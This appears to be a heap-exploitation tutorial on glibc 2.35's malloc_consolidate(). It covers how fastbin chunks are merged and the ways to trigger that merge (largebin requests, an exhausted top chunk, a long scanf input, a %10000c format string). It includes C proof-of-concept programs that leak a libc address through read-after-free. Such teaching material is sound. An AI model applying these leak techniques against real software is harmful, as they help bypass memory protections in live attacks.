malloc_consolidate()

Consolidating fastbins

Earlier, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is not quite true - fastbin chunks can consolidate, they just don't do so automatically; the function malloc_consolidate() has to be called first. This function looks complicated, but it essentially just walks the fastbins, merges adjacent free chunks into larger ones and places the results in the unsorted bin (or merges them into the top chunk if they border it).

Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!

If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if the consolidated chunk is the only element in the list, both its fd and bk will point to a location in the malloc_state struct, which is contained within libc.
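
To make that concrete, here is a minimal sketch of the leak. It assumes glibc 2.35 on x86-64, a fresh heap and no other allocations interleaved; the sizes, the tcache-filling loop and the final malloc(0x500) are illustrative choices rather than requirements:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* Fill the 0x60 tcache bin so the next frees actually reach the fastbin. */
    void *tc[7];
    for (int i = 0; i < 7; i++)
        tc[i] = malloc(0x50);

    void *a = malloc(0x50);
    void *b = malloc(0x50);     /* physically adjacent to a */
    malloc(0x20);               /* guard so b doesn't merge into the top chunk */

    for (int i = 0; i < 7; i++)
        free(tc[i]);            /* tcache bin for size 0x60 is now full */
    free(a);
    free(b);                    /* a and b land in the 0x60 fastbin */

    /* A largebin-sized request calls malloc_consolidate(): a and b are
       merged into one free chunk and linked into a main_arena bin. */
    malloc(0x500);

    /* Read-after-free: the merged chunk's fd overlaps a's old user data
       and now holds a pointer into main_arena, i.e. a libc address. */
    printf("libc leak: %p\n", *(void **)a);
    return 0;
}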

This means that the more important thing for us to know is how we can trigger a call to malloc_consolidate() in the first place.

Some of the most important ways include:

  • Inputting a very long number into scanf (around 0x400 characters long)

    • This works because the code responsible for parsing the number manages a scratch_buffer of 0x400 bytes on the stack, but falls back to malloc when the input is too big (along with realloc if it outgrows the heap chunk, and free at the end, so it can be used to trigger those functions too - great for triggering hooks!). See the sketch just after this list.

  • Inputting something along the lines of %10000c into a format string vulnerability, which also forces a largebin-sized chunk to be allocated internally for the padding
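
As a quick illustration of the scanf trick, consider a hypothetical program like the one below. It never calls malloc() itself, yet an attacker controlling stdin can still force a largebin-sized allocation (and with it a call to malloc_consolidate(), if the arena has fast chunks):

#include <stdio.h>

int main(void)
{
    int choice;

    /* If stdin holds roughly 0x400 or more digits, scanf's internal
       scratch_buffer outgrows its 0x400-byte stack array and falls back
       to malloc() for a largebin-sized buffer, which is free()d again
       once parsing finishes. */
    scanf("%d", &choice);
    return 0;
}

Piping in something like python3 -c 'print("1"*0x500)' is enough to hit that internal malloc()/free() pair.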

Both of these work because a largebin allocation triggers malloc_consolidate(). By checking the calls to the function in malloc.c (2.35), we can find other triggers.

Earlier or later glibc versions may have more or fewer calls to malloc_consolidate(), so make sure to check for your version! You may find another trigger exists.

The most common and most important trigger is a call to malloc() requesting a chunk of largebin size, which triggers a call to malloc_consolidate():

/*
   If this is a large request, consolidate fastbins before continuing [...]
 */

else
  {
    idx = largebin_index (nb);
    if (atomic_load_relaxed (&av->have_fastchunks))
      malloc_consolidate (av);
  }
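
For reference, on typical 64-bit builds the smallbin/largebin boundary (MIN_LARGE_SIZE) is 0x400 bytes, so any request whose chunk size rounds up to at least 0x400 takes this branch - for example:

#include <stdlib.h>

int main(void)
{
    /* Both requests map to chunks of at least 0x400 bytes, so
       idx = largebin_index (nb) is taken and, if the arena has fast
       chunks, malloc_consolidate() runs before the search continues. */
    malloc(0x3f8);   /* smallest request that rounds up to a 0x400 chunk */
    malloc(0x5000);  /* comfortably largebin-sized */
    return 0;
}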

There is another call to it under the use_top label. This code is reached when the top chunk has to be used to service the request. The first if condition checks whether the top chunk is large enough to do so:

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);
    av->top = remainder;
    set_head (victim, nb | PREV_INUSE |
              (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
}

If not, the next condition checks whether there are fast chunks in the arena. If there are, it calls malloc_consolidate() to attempt to regain enough space to service the request!

else if (atomic_load_relaxed (&av->have_fastchunks))
{
    malloc_consolidate (av);
    /* restore original bin index */
    if (in_smallbin_range (nb))
        idx = smallbin_index (nb);
    else
        idx = largebin_index (nb);
}

So, by exhausting the top chunk ("filling" the heap) and then requesting another chunk while fast chunks exist, we can trigger a call to malloc_consolidate().
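
Here is a rough sketch of that idea. It leans heavily on layout assumptions (glibc 2.35, x86-64, a fresh heap with nothing else allocating in between) and reads the top chunk's size straight out of memory to exhaust it precisely - a convenience for the demo, where a real exploit would use a heap leak or known layout instead:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* Fill the 0x60 tcache bin up front so the later frees reach the fastbin. */
    void *tc[7];
    for (int i = 0; i < 7; i++)
        tc[i] = malloc(0x50);

    void *a = malloc(0x50);
    void *b = malloc(0x50);          /* physically adjacent to a */

    /* This chunk acts as a guard after b and lets us locate the top
       chunk: the top chunk's size field sits at last + 0x18. */
    void *last = malloc(0x18);
    size_t top_size = *(size_t *)((char *)last + 0x18) & ~0x7UL;

    /* Carve off almost all of the top chunk, leaving exactly MINSIZE
       (0x20) bytes - too little to satisfy any further request. */
    malloc(top_size - 0x30);

    /* Now populate the fastbin. */
    for (int i = 0; i < 7; i++)
        free(tc[i]);
    free(a);
    free(b);

    /* The top chunk cannot satisfy this request, so _int_malloc reaches
       use_top, sees av->have_fastchunks and calls malloc_consolidate();
       a and b are merged into a main_arena bin before sysmalloc finally
       grows the heap to serve the request. */
    malloc(0x100);

    printf("fd of the consolidated chunk (a libc address): %p\n", *(void **)a);
    return 0;
}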

(If both conditions fail, _int_malloc falls back to sysmalloc, which essentially extends the heap or uses mmap to service the request.)
